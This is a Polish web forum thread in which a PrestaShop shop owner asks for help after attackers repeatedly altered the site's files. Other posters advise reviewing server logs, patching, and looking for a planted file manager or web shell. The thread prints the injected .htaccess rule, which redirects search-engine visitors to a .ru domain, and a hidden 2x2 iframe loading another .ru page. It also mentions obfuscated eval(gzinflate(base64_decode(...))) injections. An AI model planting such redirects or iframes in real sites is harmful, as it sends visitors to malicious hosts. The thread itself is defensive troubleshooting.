[dak977]

Witam wszystkich.
Potrzebuje pomocy, mam PrestaShopPL v. 1.4.4.1 i ostatnio ktoś regularnie podmienia mi .htaccess przez co strona pada:/ Macie może pomysł czym może to być spowodowane? Mam zainstalowane dodatkowe moduły:
Autoryzacja przy pomocy facebooka. v2.0.6 przez Maciej Zawieja
xAllegro v0.23.5
Slide v0.2
 
Tak wygląda to co mam po podmianie:

Kod: [Zaznacz]

#c3284d#
<IfModule mod_rewrite.c>

RewriteEngine On

RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|galaxy|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)

RewriteRule ^(.*)$ http://risytfa.ru/count15.php [R=301,L]

</IfModule>
#/c3284d#

[mario]

przeglad apache log
sprawdz czas utworzenia pliku i po tym szukaj w logach
w ktoryms ze skryptow masz dziure
zapewne przez ktoras z funkcji js
zaaplikuj poprawke bezpieczenstwa. mozna ja pobrac z prestashop.com

wstrzykiwany masz kod cos ala:
echo(gzinflate(base64_decode("............................");
od naszych "przyjaciol" zza wschodniej granicy.

[dak977]

ok, a możesz powiedzieć o jaką poprawkę dokładnie chodzi? Również mam ifram'e na stronie i nie mogę go znaleźć w kodzie:/

Kod: [Zaznacz]

<iframe src="http://evdyvaz.ru/count17.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>
już znalazłem...w ok 10 plikach były zmiany...tylko jak się przed tym zabezpieczyć?

[mario]

Jesli sie nie myle to poprawka bezpieczenstwa byla jedna
namiar na nia masz w glownych wiadomosciach na prestashop.com
a jak sie ustrzec?
analiza logow serwera
i latac dziury.
bardzo czesto dziury sa w modulach ktore dogrywasz
nie zeby to bylo specjalnie, poprostu ktos nie przewidzial, ze tam moze ktos chciec ci wstrzyknac zlosliwy kod

[mario]

Prawdopodobnie masz jeszcze gdzies zapisany plik, przez ktory wchodza, cos w rodzaju file managera, 99shell, lub cos podobnego.

[dak977]

znalazłem taki wątek http://www.prestashop.com/forums/topic/126114-please-read-security-procedure/
tyle,że link z fixem nie działa i nie mogę nigdzie znaleźć tego do pobrania:/

[scholl]

chyba o tym pliku mowa (zmienić rozszerzenie na php)

[dak977]

Witam ponownie,
myślałem,że herfix pomoże ale niestety nic z tego. Już po raz drugi ktoś dodaje do plików eval(gzinflate(base64_decode("pV.....
Zmieniłem hasła, uruchomiłem herfixa ale dalej gdzieś musi być dziura.
Podmiany są w każdym pliku /mails/ ,ajax_login.php ,.htaacess
Daty modyfikacji plików są od 27.07 do 04.08 a więc nie wiem czy to działanie jednej osoby , czy kilka osób dokłada coś od siebie.
Doradźcie co mam  zrobić? Czy wyczyścić serwer i zainstalować najnowszą wersję presty? A może ktoś pomoże znaleźć dziurę? Na priv podeślę namiary.

[mario]

przejrzyj logi serwera, to powinno cie naprowadzic na dziure
tak naprawde ktos moze wchodzic innymi "drzwiami"
sprawdz system gdzies musi byc manager plikow.